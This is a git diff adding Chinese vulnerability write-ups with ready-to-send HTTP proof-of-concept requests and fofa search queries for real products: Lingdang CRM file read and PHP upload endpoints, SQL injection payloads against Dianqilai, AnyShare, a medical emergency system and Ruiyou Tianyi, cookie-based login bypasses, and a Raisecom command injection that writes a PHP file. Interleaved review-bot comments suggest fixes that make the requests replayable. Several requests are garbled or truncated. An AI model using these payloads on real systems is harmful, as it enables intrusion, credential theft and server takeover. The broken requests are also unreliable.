@@ -0,0 +1,29 @@ +# 灵当crm pdf存在任意文件读取漏洞 + +# 一、漏洞简介 +灵当CRM(Customer Relationship Management,客户关系管理)是一款面向中小企业的客户关系管理软件,旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能,帮助企业在销售、市场和服务部门之间实现高效协作,提高客户满意度和业务效率。灵当crm pdf存在任意文件读取漏洞。 + +# 二、影响版本 ++ 灵当crm + +# 三、资产测绘 ++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` `body="crmcommon/js/jquery/jquery-1.10.1.min.js"` ++ 特征 + +![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/uNV9YIwNHkg-_q-Y/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-880986.png) + +# 四、漏洞复现 +```plain +POST /crm/data/pdf.php?url=../config.inc.php HTTP/1.1 +Host: +Content-Length: 2 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +``` + +![1728882377030-f7b89190-737c-4a4b-8097-45564458f641.png](./img/uNV9YIwNHkg-_q-Y/1728882377030-f7b89190-737c-4a4b-8097-45564458f641-707988.png) + + + +> 更新: 2024-10-21 11:49:37 +> 原文: \ No newline at end of file diff --git a/灵当crmuploadfile存在文件写入漏洞.md b/灵当crmuploadfile存在文件写入漏洞.md new file mode 100644 index 0000000..4b62831 --- /dev/null +++ b/灵当crmuploadfile存在文件写入漏洞.md 
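Review bot: Duplicate of 灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞.md earlier in the commit, which sends the same `GET /crm/data/pdf.php?url=../config.inc.php`; here it is a `POST` with `Content-Length: 2` and no body, so the two records disagree on the method and one of them should be corrected or the difference explained. The fofa query is mangled by auto-linking again. The 漏洞简介 ends with the bare claim "pdf存在任意文件读取漏洞"; name the component (`/crm/data/pdf.php`, parameter `url`) and the consequence (database credentials in `config.inc.php`), since that drives the remediation advice (rotate DB credentials after exposure). `原文:` is empty.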
@@ -0,0 +1,42 @@ +# 灵当crm uploadfile存在文件写入漏洞 + +# 一、漏洞简介 +灵当CRM 是一款企业级客户关系管理软件。它旨在帮助企业管理客户信息、销售流程、市场营销活动和客户服务等。灵当crm存在任意文件写入漏洞,攻击者可以通过该漏洞写入恶意文件获取服务器权限。 + +# 二、影响版本 ++ 灵当crm + +# 三、资产测绘 ++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` ++ 特征 + +![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/zbtgoiC2mvDmPJa-/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-405288.png) + +# 四、漏洞复现 +```plain +POST /crm/weixinmp/index.php?userid=123&module=Upload&usid=1&action=uploadfile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Ldwk: bG91ZG9uZ3dlbmt1 +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 67 + +file_info={"name":"1.php"}& +``` + +![1722999883677-c325fb74-5f58-4e4e-814f-8ea774b13e7f.png](./img/zbtgoiC2mvDmPJa-/1722999883677-c325fb74-5f58-4e4e-814f-8ea774b13e7f-699951.png) + +```plain +/crm/storage/2024/August/week1/172299960228103.php +``` + +![1722999942783-ec8ba7e2-6600-4657-8fea-321871ee93a1.png](./img/zbtgoiC2mvDmPJa-/1722999942783-ec8ba7e2-6600-4657-8fea-321871ee93a1-443569.png) + + + +> 更新: 2024-10-21 11:49:37 +> 原文: \ No newline at end of file diff --git a/灵当crmuploadify存在任意文件上传漏洞.md b/灵当crmuploadify存在任意文件上传漏洞.md new file mode 100644 index 0000000..353fbeb --- /dev/null +++ b/灵当crmuploadify存在任意文件上传漏洞.md 
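Review bot: Duplicate of the uploadfile hunk in 灵当CRM系统接口uploadfile文件上传漏洞.md earlier in the commit, and the two disagree on the class of bug ("文件写入" here, "文件上传" there) for the same `module=Upload&action=uploadfile` request; settle on one title. `Content-Length: 67` does not match the visible 27-byte body `file_info={"name":"1.php"}&`, so the capture has been edited without saying so. The `Accept-Ldwk: bG91ZG9uZ3dlbmt1` header is a tool marker and should be removed. The 漏洞简介 uses a shorter product description than the other 灵当 entries; a single shared paragraph would keep them consistent. `原文:` is empty.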
@@ -0,0 +1,54 @@ +# 灵当crm uploadify存在任意文件上传漏洞 + +# 一、漏洞简介 +灵当CRM(Customer Relationship Management,客户关系管理)是一款面向中小企业的客户关系管理软件,旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能,帮助企业在销售、市场和服务部门之间实现高效协作,提高客户满意度和业务效率。灵当crm uploadify存在任意文件上传漏洞。 + +# 二、影响版本 ++ 灵当crm + +# 三、资产测绘 ++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` ++ 特征 + +![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/89rFkHy0Jze9KFbC/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-481570.png) + +# 四、漏洞复现 +```java +POST /crm/uploaddify/uploadify.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Length: 10338 + +-----------------------------45250802924973458471174811279 +Content-Disposition: form-data; name="Filedata"; filename="1.php" +Content-Type: images/cat_icon + + +-----------------------------45250802924973458471174811279 +Content-Disposition: form-data; name="myatt_moduel" + +1 +-----------------------------45250802924973458471174811279 +Content-Disposition: form-data; name="myatt_id"; + +1 +-----------------------------45250802924973458471174811279 +``` + +![1725194375782-5456a1c1-b949-4db3-ba8f-a06824257440.png](./img/89rFkHy0Jze9KFbC/1725194375782-5456a1c1-b949-4db3-ba8f-a06824257440-425903.png) + +上传路径 + +```java +/crm/storage/1/1/1.php +``` + +![1725194400326-59fd1c75-9f0b-4a2f-bfea-a6064b740ba7.png](./img/89rFkHy0Jze9KFbC/1725194400326-59fd1c75-9f0b-4a2f-bfea-a6064b740ba7-647080.png) + + + +> 更新: 2024-10-21 11:49:38 +> 原文: \ No newline at end of file diff --git a/灵当crmupload存在任意文件上传漏洞.md b/灵当crmupload存在任意文件上传漏洞.md new file mode 100644 index 0000000..cb75874 --- /dev/null +++ b/灵当crmupload存在任意文件上传漏洞.md 
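Review bot: The request path is `/crm/uploaddify/uploadify.php` (double d) while the title and filename say `uploadify`; confirm which spelling the product actually uses, because a wrong path makes both the PoC and any detection rule useless. The recorded multipart body is internally inconsistent: `Content-Length: 10338` against a few dozen bytes, the last boundary line is not terminated with `--`, and `name="myatt_id";` has a stray semicolon; mark the capture as abridged or reproduce it verbatim. The 漏洞简介 says only "uploadify存在任意文件上传漏洞"; the `Content-Type: images/cat_icon` on a `.php` part shows the server accepts arbitrary MIME strings, which is the root cause a fix should name. `原文:` is empty and the fofa query is mangled by auto-linking.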
@@ -0,0 +1,48 @@ +# 灵当crm upload存在任意文件上传漏洞 + +# 一、漏洞简介 +灵当CRM 是一款企业级客户关系管理软件。它旨在帮助企业管理客户信息、销售流程、市场营销活动和客户服务等。灵当crm存在任意文件上传漏洞,攻击者可以通过该漏洞写入恶意文件获取服务器权限。 + +# 二、影响版本 ++ 灵当crm + +# 三、资产测绘 ++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` ++ 特征 + +![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/j8nQmcKhk10d4pW9/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-980852.png) + +# 四、漏洞复现 +```plain +POST /crm/upload.php HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Content-Type: multipart/form-data; boundary=----234561 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Content-Length: 149 + +------234561 +Content-Disposition: form-data; name="file"; filename="aa.php" +Content-Type: application/octet-stream + +234561 +------234561-- +``` + +![1724488643826-3811d571-231f-4716-afa1-4b1ccc1f1146.png](./img/j8nQmcKhk10d4pW9/1724488643826-3811d571-231f-4716-afa1-4b1ccc1f1146-899092.png) + +```plain +/crm/recordData/20240824/aa.php +其中20240824为当前时间 +``` + +![1724488682774-49825d41-a6b0-4d3b-9280-1734b8fa1b04.png](./img/j8nQmcKhk10d4pW9/1724488682774-49825d41-a6b0-4d3b-9280-1734b8fa1b04-648240.png) + + + +> 更新: 2024-10-21 11:49:37 +> 原文: \ No newline at end of file diff --git a/灵当crmwechatSession存在任意文件上传漏洞.md b/灵当crmwechatSession存在任意文件上传漏洞.md new file mode 100644 index 0000000..1cae987 --- /dev/null +++ b/灵当crmwechatSession存在任意文件上传漏洞.md 
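Review bot: The line `其中20240824为当前时间` is an explanatory note but sits inside the ```plain block with the path; move it to prose below the block so the block contains only the path. The 漏洞简介 is copied from the uploadfile entry and does not name `/crm/upload.php` or distinguish this endpoint from the four other 灵当 upload endpoints in this commit; a sentence on what differs (no parameters at all, date-based `recordData/` directory) would justify a separate file. `影响版本` is the generic "灵当crm" and `原文:` is empty; `Content-Length: 149` should be checked against the body.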
@@ -0,0 +1,44 @@ +# 灵当crm wechatSession存在任意文件上传漏洞 + +# 一、漏洞简介 +灵当CRM(Customer Relationship Management,客户关系管理)是一款面向中小企业的客户关系管理软件,旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能,帮助企业在销售、市场和服务部门之间实现高效协作,提高客户满意度和业务效率。灵当crm wechatSession存在任意文件上传漏洞。 + +# 二、影响版本 ++ 灵当crm + +# 三、资产测绘 ++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` ++ 特征 + +![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/_w2Gyv2xSYRBrMgJ/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-091281.png) + +# 四、漏洞复现 +```plain +POST /crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Length: 10338 + +-----------------------------45250802924973458471174811279 +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/jpeg + + +-----------------------------45250802924973458471174811279 +``` + +![1728882630940-32cf6935-cb61-43f2-bb84-4062e86a1fea.png](./img/_w2Gyv2xSYRBrMgJ/1728882630940-32cf6935-cb61-43f2-bb84-4062e86a1fea-574633.png) + +```plain +/crm//storage//wechatsession//2024//10//14//1.php +``` + +![1728882649323-7a5fedf2-fef6-49d3-a859-9f09ab4ab279.png](./img/_w2Gyv2xSYRBrMgJ/1728882649323-7a5fedf2-fef6-49d3-a859-9f09ab4ab279-976058.png) + + + +> 更新: 2024-10-21 11:49:37 +> 原文: \ No newline at end of file diff --git a/点企来客服系统getwaitnum存在sql注入漏洞.md b/点企来客服系统getwaitnum存在sql注入漏洞.md new file mode 100644 index 0000000..96b8952 --- /dev/null +++ b/点企来客服系统getwaitnum存在sql注入漏洞.md 
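Review bot: Duplicate of 灵当CRM系统接口wechatSession文件上传漏洞.md earlier in the commit, down to the same `token=9b06a9617174f1085ddcfb4ccdb6837f`; as noted there, the entry must say whether that token is a fixed product constant (then it is the headline finding) or a captured secret (then redact it). The result path `/crm//storage//wechatsession//2024//10//14//1.php` has doubled slashes, presumably copied from the server response; either normalise it or state that the response returns it in that form. The multipart body declares `Content-Length: 10338`, has an empty file part and no closing `--` boundary, so mark it as abridged. `原文:` is empty; the fofa query is auto-linked into an invalid expression.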
@@ -0,0 +1,32 @@ +# 点企来客服系统getwaitnum存在sql注入漏洞 + +点企来客服系统getwaitnum存在sql注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。 + +## fofa + +```yaml +body="layui-form-item" && body="/admin/login/check.html" +``` + +## poc + +```java +POST /admin/event/getwaitnum HTTP/2 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: keep-alive +Content-Length: 84 +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate, br + +business_id[]=exp&business_id[]=+and+updatexml(1,concat(0x7e,md5(0x5c)),1)&groupid=1 +``` + +![image-20240823213038237](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408232130305.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/unbf6JO5U9OAqdVq8YFbuQ \ No newline at end of file diff --git a/点企来客服系统存在硬编码漏洞.md b/点企来客服系统存在硬编码漏洞.md new file mode 100644 index 0000000..dac0623 --- /dev/null +++ b/点企来客服系统存在硬编码漏洞.md @@ -0,0 +1,27 @@ +# 点企来客服系统存在硬编码漏洞 + +点企来客服系统存在硬编码漏洞,攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。 + +## fofa + +```yaml +body="layui-form-item" && body="/admin/login/check.html" +``` + +## poc + +```javascript +GET /admin/custom/index.html HTTP/1.1 +Host: +Cookie: service_token=OuwfoovK%2BIdd +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +X-Requested-With: XMLHttpRequest +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409261034762.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/AeXSpX7Jrfkp8B1PjUHX-g \ No newline at end of file diff --git a/热网无线监测系统GetMenuItem存在SQL注入漏洞.md b/热网无线监测系统GetMenuItem存在SQL注入漏洞.md new file mode 100644 index 0000000..f0596ac --- /dev/null +++ b/热网无线监测系统GetMenuItem存在SQL注入漏洞.md 
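Review bot: These two entries are the only ones in the commit with a 漏洞来源 section; that should be the norm, not the exception. In the getwaitnum request the request line says `HTTP/2` yet the record is in HTTP/1.1 text form and includes `Connection: keep-alive`, a connection-specific header that HTTP/2 forbids; it was almost certainly captured as HTTP/1.1 and should be recorded that way. The 硬编码 entry never states what is hard-coded: the fixed `Cookie: service_token=OuwfoovK%2BIdd` is evidently the constant, and saying so lets operators search their logs for that exact cookie value as an indicator. The fofa blocks are fenced as ```yaml and the requests as ```java/```javascript; use ```http.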
@@ -0,0 +1,23 @@ +## 热网无线监测系统GetMenuItem存在SQL注入漏洞 + +热网无线监测系统 GetMenuItem 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +body="Downloads/HDPrintInstall.rar" || body="skins/login/images/btn_login.jpg" +``` + +## poc + +```javascript +POST /DataSrvs/UCCGSrv.asmx/GetMenuItem HTTP/1.1 +Host: +accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +name=1') waitfor delay '0:0:5'-- + +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081939869.png) \ No newline at end of file diff --git a/爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞.md b/爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞.md new file mode 100644 index 0000000..d6cee39 --- /dev/null +++ b/爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞.md @@ -0,0 +1,25 @@ +# 爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞 + +爱数 AnyShare智能内容管理平台 Usrm_GetAllUsers 接口存在信息泄露漏洞,未经身份认证的攻击者可获取用户名密码等敏感信息。可登录后台,使系统处于极不安全状态。 + +## fofa + +```javascript +app="AISHU-AnyShare" +``` + +## poc + +```javascript +OST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +[1,100] +``` + +![image-20241108205715836](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411082057919.png) \ No newline at end of file diff --git a/爱数企业云盘存在信息泄露漏洞.md b/爱数企业云盘存在信息泄露漏洞.md new file mode 100644 index 0000000..dcd4c28 --- /dev/null +++ b/爱数企业云盘存在信息泄露漏洞.md 
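Review bot: in the 爱数AnyShare Usrm_GetAllUsers poc the request line reads `OST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1`; the method lost its first letter and must be `POST`, otherwise the request fails before reaching the endpoint. The body `[1,100]` is a JSON array but no `Content-Type` header is sent; state whether the server accepts it without one or add `Content-Type: application/json`. The 热网 GetMenuItem hunk gives only the time-based payload `name=1') waitfor delay '0:0:5'--` and a screenshot; add one sentence saying that a roughly five-second response delay is the success indicator, since nothing else in the text tells the reader what to look for.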
@@ -0,0 +1,32 @@ +# 爱数企业云盘存在信息泄露漏洞 + +# 一、漏洞简介 +爱数企业云盘是一个备受欢迎的企业级云存储解决方案,其主要特点包括1、数据安全性高,2、存储容量大,3、访问便捷。爱数企业云盘通过多重加密和权限控制,保障了企业数据的安全性。其大容量存储可以满足企业大量数据存储需求,并且用户可以通过多种设备便捷访问数据。爱数企业云盘存在任意信息泄露漏洞 + +# 二、影响版本 +爱数企业云盘 + +# 三、资产测绘 ++ fofa`app="AISHU-AnyShare"` ++ 特征 + +![1730710857097-161efd6a-0577-47d8-a3d6-a82d1634dc19.png](./img/nfcJYEdXCi3NMsDs/1730710857097-161efd6a-0577-47d8-a3d6-a82d1634dc19-105570.png) + +# 三、漏洞复现 +```java +POST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1 +Host: + +[1,100] +``` + +![1730710998770-27410fe5-6d05-4d12-8c3b-080e4dc815ac.png](./img/nfcJYEdXCi3NMsDs/1730710998770-27410fe5-6d05-4d12-8c3b-080e4dc815ac-017381.png) + +使用账号密码登录 + +![1730710969054-6267588d-2c93-466a-a855-f31713dfc801.png](./img/nfcJYEdXCi3NMsDs/1730710969054-6267588d-2c93-466a-a855-f31713dfc801-355450.png) + + + +> 更新: 2024-11-27 10:00:07 +> 原文: \ No newline at end of file diff --git a/珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞.md b/珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞.md new file mode 100644 index 0000000..b61cc5b --- /dev/null +++ b/珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞.md 
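Review bot: this file duplicates 爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞.md from the same patch: both send `POST /api/ShareMgnt/Usrm_GetAllUsers` with body `[1,100]` and use the same fofa query `app="AISHU-AnyShare"`. Keep one file (the `使用账号密码登录` follow-up step is the only content unique to this one) and drop or cross-link the other. Two smaller points: the headings run `# 三、资产测绘` then `# 三、漏洞复现`, so the second should be `四`; and the trailing `> 原文:` line is empty here and in the other yuque-exported files, so either fill in the source URL or remove the empty field.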
@@ -0,0 +1,39 @@ +# 珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞 +珠海市安克电子技术有限公司成立于1992年,专业从事急救信息化系统集成与软件开发,是国内领先的院前急救信息系统供应商。在北京、合肥、西安设有研发中心,在全国设有分支机构和服务网点20个,具有ISO9000等质量体系、高新技术企业、软件企业、信息系统集成等多项认证资质珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞。 + +## fofa +```javascript +fid="v6Cd4x0Px/YZrVqV3jQ3xQ==" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/21711125/1730787843764-4e1b3e61-0356-40a1-8d4e-f1bd5d92cf5a.png) + +## poc +```java +POST /api/Service.asmx HTTP/1.1 +X-Requested-With: XMLHttpRequest +Cookie: ASP.NET_SessionId=exrktu3aplxg004tcc2ntnuw; FailCount=5; ASPSESSIONIDSSDTSCDA=OLGBFHMCDJBLGKGENPLEECCO +SOAPAction: http://tempuri.org/GetAmbulance +Content-Type: text/xml +Content-Length: 296 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Encoding: gzip,deflate,br +User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE) +Host: +Connection: Keep-alive + + + + + + + 11' AND 6537 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6537=6537) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)))-- ntgj + + + +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731332070574-8670e58d-e01a-42eb-a55c-c5afe4928fdc.png) + + + diff --git a/珠海新华通软件股份有限公司云平台存在登录绕过漏洞.md b/珠海新华通软件股份有限公司云平台存在登录绕过漏洞.md new file mode 100644 index 0000000..b6eeda8 --- /dev/null +++ b/珠海新华通软件股份有限公司云平台存在登录绕过漏洞.md 
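Review bot: the SOAP request in the 安克 poc is missing its XML body: only the injected parameter value `11' AND 6537 IN (SELECT (CHAR(113)+CHAR(106)+...))-- ntgj` survives, while the envelope, body and the operation element (whose name is now visible only in `SOAPAction: http://tempuri.org/GetAmbulance`) are gone, so `Content-Length: 296` no longer matches and the request cannot be replayed. Restore the SOAP envelope together with the name of the injected parameter element. Also clean the captured headers: `User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)` repeats the header name, and `Cookie: ASP.NET_SessionId=exrktu3aplxg004tcc2ntnuw; FailCount=5; ASPSESSIONIDSSDTSCDA=...` is a leftover lab session that is not part of the exploit.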
@@ -0,0 +1,29 @@ +# 珠海新华通软件股份有限公司云平台存在登录绕过漏洞 + +珠海新华通软件股份有限公司云平台存在登录绕过漏洞,漏洞允许攻击者通过简单操作,如添加特定Cookie或修改请求参数,绕过身份验证直接访问后台,从而对系统安全构成严重威胁。 + +## fofa + +```javascript +icon_hash="513304261" +``` + +## POC + +```javascript +POST /Main/Desktop/Default.aspx HTTP/1.1 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Content-Length: 166 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: ASP.NET_SessionId=x01ftldfm5dwbbo1tx1ne1kv; #_SSO_Login_UserID=admin; #_SSO_Login_UserID_Guid= +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +X-Requested-With: XMLHttpRequest +``` + +请求/Main/Desktop/Default.aspx 加cookie认证`#_SSO_Login_UserID=admin ` 即可绕过登录进入后台 + +![image-20240831234213408](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408312342494.png) \ No newline at end of file diff --git a/瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md b/瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md new file mode 100644 index 0000000..b6110d7 --- /dev/null +++ b/瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# 瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞 + +瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞 + +## fofa + +```javascript +app="REALOR-天翼应用虚拟化系统" +``` + +## poc + +```javascript +GET /RAPAgent.XGI?CMD=GetPwdPolicy&User=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7e%2C%28SELECT+user()%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: keep-alive +``` + diff --git a/瑞斯康达main.asp未授权访问漏洞.md b/瑞斯康达main.asp未授权访问漏洞.md new file mode 100644 index 0000000..b3af35f --- /dev/null +++ b/瑞斯康达main.asp未授权访问漏洞.md 
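Review bot: the 新华通 poc declares `Content-Length: 166` and `Content-Type: application/x-www-form-urlencoded; charset=UTF-8` but shows no body, so either the form body was dropped or the request should be a plain GET; the prose below says only the cookie `#_SSO_Login_UserID=admin` is needed, so make the request match that and remove the length header. Also say that `#_SSO_Login_UserID_Guid=` is deliberately sent empty and that `ASP.NET_SessionId=x01ftldfm5dwbbo1tx1ne1kv` is a captured value, not a requirement.

Review bot: the 瑞友天翼 GetPwdPolicy hunk has no description and no success indicator. Decoded, the payload is `1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7e,(SELECT user()),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -` (13 columns); state that the database user name between `~` markers in the response confirms the injection, and add a response excerpt or screenshot as the sibling files do.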
@@ -0,0 +1,23 @@ +# 瑞斯康达main.asp未授权访问漏洞 + +瑞斯康达 wireless main.asp 存在未授权访问漏洞。 + +## fofa + +```javascript +banner="Server: INP httpd" || header="Server: INP httpd" +``` + +## poc + +```javascript +GET /main.asp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Ge cko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Cookie: sessionid=admin +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410290944091.webp) \ No newline at end of file diff --git a/瑞斯康达多业务智能网关list_base_config存在远程命令执行漏洞.md b/瑞斯康达多业务智能网关list_base_config存在远程命令执行漏洞.md new file mode 100644 index 0000000..2618133 --- /dev/null +++ b/瑞斯康达多业务智能网关list_base_config存在远程命令执行漏洞.md 
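Review bot: the trigger in the main.asp poc is the cookie `Cookie: sessionid=admin`, but the description only says `main.asp 存在未授权访问漏洞`; state that a fixed session id of `admin` is accepted and that the page otherwise requires login, otherwise the cookie reads as a captured artefact to be replaced. The `User-Agent` line contains `Ge cko/20100101`, a stray space from copy-paste; write `Gecko/20100101`.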
@@ -0,0 +1,37 @@ +# 瑞斯康达多业务智能网关list_base_config存在远程命令执行漏洞 + +# 一、漏洞简介 +瑞斯康达多业务智能网关是一款集多种功能于一体的网络设备,专为中小企业及行业分支机构设计,以满足其多业务接入和带宽提速的需求,如MSG2100E系列、MSG2300系列等,是瑞斯康达科技发展股份有限公司推出的新一代网络产品。这些网关集成了数据、语音、安全、无线等多种功能,能够为用户提供综合、完整的网络接入解决方案。它们广泛应用于政企单位、商务楼宇、校园、工业园区等场景,为用户带来高效、便捷的网络体验。瑞斯康达-多业务智能网关 list_base_config.php 存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +# 二、影响版本 ++ 瑞斯康达多业务智能网关 + +# 三、资产测绘 ++ fofa`body="/images/raisecom/back.gif" && title=="Web user login"` ++ 特征 + +![1722216563849-bac29c1c-6bcf-4634-8051-d96acefe908e.png](./img/jEltp2OV3_wK85dl/1722216563849-bac29c1c-6bcf-4634-8051-d96acefe908e-196339.png) + +# 四、漏洞复现 +```plain +GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 +Accept: 